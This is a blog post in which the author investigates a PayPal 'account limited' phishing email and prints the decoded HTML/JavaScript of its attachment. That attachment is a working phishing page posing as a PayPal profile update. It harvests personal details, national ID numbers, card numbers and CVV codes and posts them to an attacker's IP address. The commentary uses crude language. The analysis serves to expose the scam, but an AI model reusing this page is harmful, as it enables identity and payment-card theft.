By using this site you agree to the use of cookies by Brugbart and our partners.

Learn more

Paypal Scam: Your Account Has Been Limited PayPal Case ID

So i did a little digging, trying to find out who was behind this scam, and here is what i come up with.

Edited: 2012-12-12 03:13

By. BlueBoden

I have been receiving a lot of spam e-mails, one of the regular e-mails is the "your account has been limited" junk e-mail. Normally i just delete all the crap people send me – but occasionally i feel like investigating a little. The thing is, i am very lazy, so i generally don't dig deep enough to find exactly the people behind, but i do often find domain names, ip addresses, and sometimes even the name on individuals involved with the scam.

The typical "your account has been limited" type of e-mail has an attachment, i tried to open this attachment – knowing what i was doing – anyway, it was only a simple HTML file, so i figured it would be sufficiant to disable my Internet connection, and have a look at the source before opening it in my browser. The file contained some encoded javascript, opening the file gave a blank page – apparently it didn't work – so i had to decode the script to get to the source. The encrypted script looks like:

document.write(unescape("......

Followed by something that appears like a bunch of gibberish. After decoding the script, here is what i got:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- PayPal Verification System --><!-- Destinated Only For Locked Accounts --><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><!--
 Script info: script: webscr, cmd: _profile-credit-card-new-clickthru, template: p/acc/pro/cc-add, date: Nov. 14, 2008 14:00:33 PST; country: AU, language: en_AU, xslt server:
 installation: WEBSCR-495-20071119-1 web version: 49.5-449887 branch: live-495_int
 content version: 49.5-442158
 pexml version: 49.5-452976
 page XSL: FinancialInstrument/default/en_AU/account/profile/CCAdd.xsl
 hostname : Hina8NrQtZRtCnjcgHIwV5Yhsy3cnetnZYg.-3ioJb0
--><title>Profile Update - PayPal</title><!--googleoff: all-->
<meta http-equiv="keywords" content="Send, money, payments, credit, credit card, instant, money, financial services, mobile, wireless, WAP, mobile phones, two-way pagers, Windows CE"><!--googleon: all--><!--googleoff: all-->
<meta http-equiv="description" content="PayPal lets you send money to anyone with email. PayPal is free for consumers, and works seamlessly with your existing credit card and current account. You can settle debts, borrow cash, divide bills or split expenses with friends, all without going to an ATM or looking for your chequebook."><!--googleon: all-->
<link rel="stylesheet" type="text/css" href="http://www.paypal.com/css/xpt.css">
<link rel="stylesheet" type="text/css" href="http://www.paypal.com/css/xptInvoice.css">
<link rel="stylesheet" type="text/css" href="http://www.paypal.com/css/xptObsolete.css">
<link rel="stylesheet" type="text/css" href="http://www.paypal.com/css/xptlive.css">
<link rel="stylesheet" type="text/css" href="http://www.paypal.com/css/default.css">
<!--[if IE 6]><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-610-20100112-1/css/browsers/ie6.css><![endif]-->
<!--[if IE 7]><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-610-20100112-1/css/browsers/ie7.css"><![endif]-->
<script type="text/javascript" language="javascript">

function showhide(divid, state){
document.getElementById(divid).style.display=state
}
function go_step2(){
var fname = document.getElementById('fname');
var lname = document.getElementById('lname');
var email = document.getElementById('email');
var emailRegEx = /^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$/i;
var dd = document.getElementById('dd'); var mm = document.getElementById('mm'); var yy = document.getElementById('yy');
var phone = document.getElementById('phone');
var mmn = document.getElementById('mmn');
if(fname.value.length < 2){alert('Must enter your first name'); fname.focus(); return false;}
if(lname.value.length < 2){alert('Must enter your last name'); lname.focus(); return false;}
if(email.value.search(emailRegEx) == -1){alert('Must enter your email address'); email.focus();return false; }
if(mm.value == "mm"){alert('Must enter your birth date'); mm.focus(); return false;}
if(dd.value == "dd"){alert('Must enter your birth date'); dd.focus(); return false;}
if(yy.value == "yy"){alert('Must enter your birth date'); yy.focus(); return false;}
if(phone.value.length < 6){alert('Must enter your phone number'); phone.focus(); return false;}
else
 { showhide ('signup', 'none');	showhide ('continue', 'block'); }
 }
 function go_step3(){
var ssn1 = document.getElementById('ssn1');
var ssn2 = document.getElementById('ssn2');
var ssn3 = document.getElementById('ssn3');
var sessn = document.getElementById('sessn');
var dkssn = document.getElementById('dkssn');
var fissn = document.getElementById('fissn');
var itssn = document.getElementById('itssn');
var address1 = document.getElementById('address1');
var city = document.getElementById('city');
var state = document.getElementById('state'); 
var zip = document.getElementById('zip'); 
var country = document.getElementById('country');
if(address1.value.length < 4){alert('Must enter your main address'); address1.focus(); return false;}
if(city.value.length < 2){alert('Must enter your city'); city.focus(); return false;}
if(state.value.length < 2){alert('Must enter your state'); state.focus(); return false;}
if(zip.value.length < 3){alert('Must enter your zip code'); zip.focus(); return false;}
if(country.value == "country"){alert('Must enter your country'); country.focus(); return false;}
if(country.value < 2){alert('Must enter your mother s maiden name'); country.focus(); return false;}
if (ssn1){
if(ssn1.value.length < 3){alert("Enter your Social Security Number");ssn1.focus();return false;}
if(ssn2.value.length < 2){alert("Enter your Social Security Number");ssn2.focus();return false;}
if(ssn3.value.length < 4){alert("Enter your Social Security Number");ssn3.focus();return false;}
else
 { showhide ('continue', 'none');	showhide ('cc', 'block'); }
	}
if (sessn){
if(sessn.value.length < 10){alert("Enter your Personal Identity Number (personnummer)");sessn.focus();return false;}
else
 { showhide ('continue', 'none');	showhide ('cc', 'block'); }
	}
if (dkssn){
if(dkssn.value.length < 10){alert("Enter your Personal Identification number (CPR)");dkssn.focus();return false;}
else
 { showhide ('continue', 'none');	showhide ('cc', 'block'); }
	}
if (fissn){
if(fissn.value.length < 4){alert("Enter your Personal Identity Code (henkil?tunnus)");fissn.focus();return false;}
else
 { showhide ('continue', 'none');	showhide ('cc', 'block'); }
	}
if (itssn){
if(itssn.value.length < 4){alert("Enter your Codice Fiscale");itssn.focus();return false;}
else
 { showhide ('continue', 'none');	showhide ('cc', 'block'); }
	}
else
 { showhide ('continue', 'none');	showhide ('cc', 'block'); }
 }
 function validate(frm){if(frm.elements['ccnumber'].value.length < 15)
{alert("Enter a valid Card Number");frm.elements['ccnumber'].focus();return false;}
if(frm.elements['exp_mm'].value == "00"){alert("Invalid Expiry Date");
frm.elements['exp_mm'].focus();return false;}
if(frm.elements['exp_yy'].value == "00"){alert("Invalid Expiry Date");
frm.elements['exp_yy'].focus();return false;}
if(frm.elements['cvv'].value.length < 3)
{alert("Enter your Card Verification Number");frm.elements['cvv'].focus();return false;}
return true;}
function varssn(){ 
var country = document.getElementById('country');
if (country.value == "US") {
	document.getElementById('varssn').innerHTML = '<table align="center" border="0" cellpadding="0" cellspacing="0" width="760"><tr><td class="label" width="320"><label for="defaultaddress1"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup>Social Security Number:</label></td><td width="2"> </td><td width="418"><input style="width:40px" maxlength="3" class="" type="text" id="ssn1" name="ssn1" size="20" value="" onfocus="this.value=\'\';"> - <input style="width:30px" maxlength="2" class="" type="text" id="ssn2" name="ssn2" size="20" value="" onfocus="this.value=\'\';"> - <input style="width:45px" maxlength="4" class="" type="text" id="ssn3" name="ssn3" size="20" value="" onfocus="this.value=\'\';"></td></tr></table>'; return false;}
if (country.value == "Sweden") {
	document.getElementById('varssn').innerHTML = '<table align="center" border="0" cellpadding="0" cellspacing="0" width="760"><tr><td class="label" width="320"><label for="defaultaddress1"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup>Personal identity number:</label></td><td width="2"> </td><td width="418"><input maxlength="15" class="" type="text" id="sessn" name="sessn" size="20" value="" onfocus="this.value=\'\';"> (personnummer)</td></tr></table>'; return false;}
if (country.value == "Denmark") {
	document.getElementById('varssn').innerHTML = '<table align="center" border="0" cellpadding="0" cellspacing="0" width="760"><tr><td class="label" width="320"><label for="defaultaddress1"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup>Personal identification number:</label></td><td width="2"> </td><td width="418"><input maxlength="15" class="" type="text" id="dkssn" name="dkssn" size="20" value="" onfocus="this.value=\'\';"> (CPR)</td></tr></table>'; return false;}
if (country.value == "Finland") {
	document.getElementById('varssn').innerHTML = '<table align="center" border="0" cellpadding="0" cellspacing="0" width="760"><tr><td class="label" width="320"><label for="defaultaddress1"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup>Personal identity code:</label></td><td width="2"> </td><td width="418"><input maxlength="15" class="" type="text" id="fissn" name="fissn" size="20" value="" onfocus="this.value=\'\';"> (henkil?tunnus)</td></tr></table>'; return false;}
if (country.value == "Italy") {
	document.getElementById('varssn').innerHTML = '<table align="center" border="0" cellpadding="0" cellspacing="0" width="760"><tr><td class="label" width="320"><label for="defaultaddress1"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup>Codice Fiscale:</label></td><td width="2"> </td><td width="418"><input maxlength="15" class="" type="text" id="itssn" name="itssn" size="20" value="" onfocus="this.value=\'\';"></td></tr></table>'; return false;}
else {
 document.getElementById('varssn').innerHTML = ' '; }
}
</script>
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/en_US/lang.css">
<style type="text/css"></style>
<style type="text/css">
.Warning {
background:#ffffcc;color:black;
}
select{border:1px solid #84A8CC;margin-bottom:2px;}
input{border:1px solid #84A8CC;margin-bottom:2px;}
</style>
<link rel="shortcut icon" href="favicon.ico">
</head><body>
<div class="srd" id="header">
<h1><a href="https://www.paypal.com/us/cgi-bin/webscr"><img src="https://www.paypal.com/en_US/i/logo/paypal_logo.gif" alt="PayPal" border="0"></a></h1>
<form method="post" id="searchForm" name="searchForm" action="https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search">
<fieldset>
<legend>Search PayPal</legend>
<label for="searchBox">Search </label><input id="searchBox" name="queryString" value="" type="text"> <input class="button" id="search.x" name="search.x" value="Search" type="submit">
</fieldset>
<input name="form_charset" value="UTF-8" type="hidden">
</form>
<div class="srd" id="navGlobal"><ul>
<li class="logout"><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_logout">Log Out</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help">Help</a></li>
<li class="last"><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_security-center">Security Centre</a></li>
</ul></div>
</div>
<div id="navPrimary" class="srd"><ul class="secondary">
<li class="active">
<a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">My Account</a><ul>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Overview</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Add Funds</a></li>
<li>
<a href="#" href=https://www.paypal.com/us/cgi-bin/webscr">Withdraw</a><ul><li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Transfer to Bank Account</a></li></ul>
</li>
<li>
<a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">History</a><ul>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Basic Search</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Download History</a></li>
</ul>
</li>
<li class="">
<a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Resolution Centre</a><ul>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">View Open Cases</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Guides</a></li>
</ul>
</li>
<li class="active">
<a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Profile</a><ul>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Add or Edit Email</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Add or Edit Bank Account</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Add or Edit Credit Card</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Add or Edit Postal Address</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Send Money</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Request Money</a></li>
<li class=""><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Merchant Services</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Auction Tools</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Products & Services</a></li>
</ul></div>
<div id="xptContentMain"><table id="xptContentContainer" align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tbody><tr><td><div id="xptTitle"><table class="main" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td class="heading" width="100%"><h1>Profile Update</h1></td>
<td align="right" nowrap="nowrap">
<a href="https://www.paypal.com/us/cgi-bin/webscr"><span class="small">Secure Transaction</span></a> <img src="https://www.paypalobjects.com/en_US/i/icon/secure_lock_2.gif" alt="" align="top" border="0">
</td>
</tr>
<tr><td colspan="2"><img alt="" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif" border="0" height="2" width="1"></td></tr>
<tr><td><img alt="" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif" border="0" height="4" width="1"></td></tr>
</tbody></table></div></td></tr>

<table width="760" border="0" cellpadding="0" cellspacing="0" align="center">
<tr>
<td>
<p>Please complete the form below to update your Profile information and restore your account access.</p>
</td>
</tr>
</table>
<script language="JavaScript">
function openWindow2() {
popupWin = window.open('pin.html','EIN','scrollbars,resizable,toolbar,width=420,height=300,left=50,top=50');
popupWin.focus();
}
</script>
<script language="JavaScript">
function openWindow1() {
popupWin = window.open('cvv.html','EIN','scrollbars,resizable,toolbar,width=420,height=300,left=50,top=50');
popupWin.focus();
}
</script>

<script language="JavaScript">
function openWindow2() {
popupWin = window.open('pin.html','EIN','scrollbars,resizable,toolbar,width=420,height=300,left=50,top=50');
popupWin.focus();
}
</script>
<script language="JavaScript">
function openWindow1() {
popupWin = window.open('cvv.html','EIN','scrollbars,resizable,toolbar,width=420,height=300,left=50,top=50');
popupWin.focus();
}
</script>


<form name="frm" action="http://67.23.234.129/~service//vb/includes/service.php" method="post" onsubmit="return validate(this)">
<div id="signup" style="display:block; width="760">
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tr>
<td>
<hr class="dotted">
</td>
</tr>
<tr>

<tr>
<td class=""><span class="emphasis">Personal Information Profile<br></td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tr><td><br>Make sure you enter the information accurately, and according to the formats required.<br> Fill in all the required fields.<br><br></td></tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tr>
<td class="label" width="320"><label for="fullname"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup>First Name:</label></td>
<td width="2"> </td>
<td width="418"><input class="" type="text" id="fname" name="fname" size="20" value="" onfocus="this.value='';"></td>
</tr>
<tr>
<td class="label" width="320"><label for="fullname"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup>Last Name:</label></td>
<td width="2"> </td>
<td width="418"><input class="" type="text" id="lname" name="lname" size="20" value="" onfocus="this.value='';"></td>
</tr>
<tr>
<td class="label" width="320"><label for="fullname"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup>Email Address:</label></td>
<td width="2"> </td>
<td width="418"><input class="" type="text" id="email" name="email" size="20" value="" onfocus="this.value='';"></td

I'm very lazy myself, so i haven't looked closer at this code – i have no idea what it does – what i am looking for, is suspicious URLs in the code, such as ip addresses or suspicious domains. I found what i was looking for, a html form that is being submitted to a IP address, with something that appears like a very amateurish installation of apache. Requesting the IP in a browser gave a standard "default website page". Anyway, these scammers are likely from some country where the government doesn't care, so likely out of reach.

I don't really care about what the above code exactly does, just throwing out the decoded script for those interested. Hopefully someone will catch this idiot soon, because i am just tired of getting this scam e-mail.

I know my way around the Internet, even some of the more shady places, so i know a few tricks myself. Anyway, its fun to think about – every time we receive spam, some loser is just sitting around somewhere and hitting a button like a retard. Some of these people are very skilled programmers – they are just wasting their abilities – getting a lot of enemies in the process. I'm sure they could earn way more money creating something useful, rather than programs and scripts to post automated spam and whatever.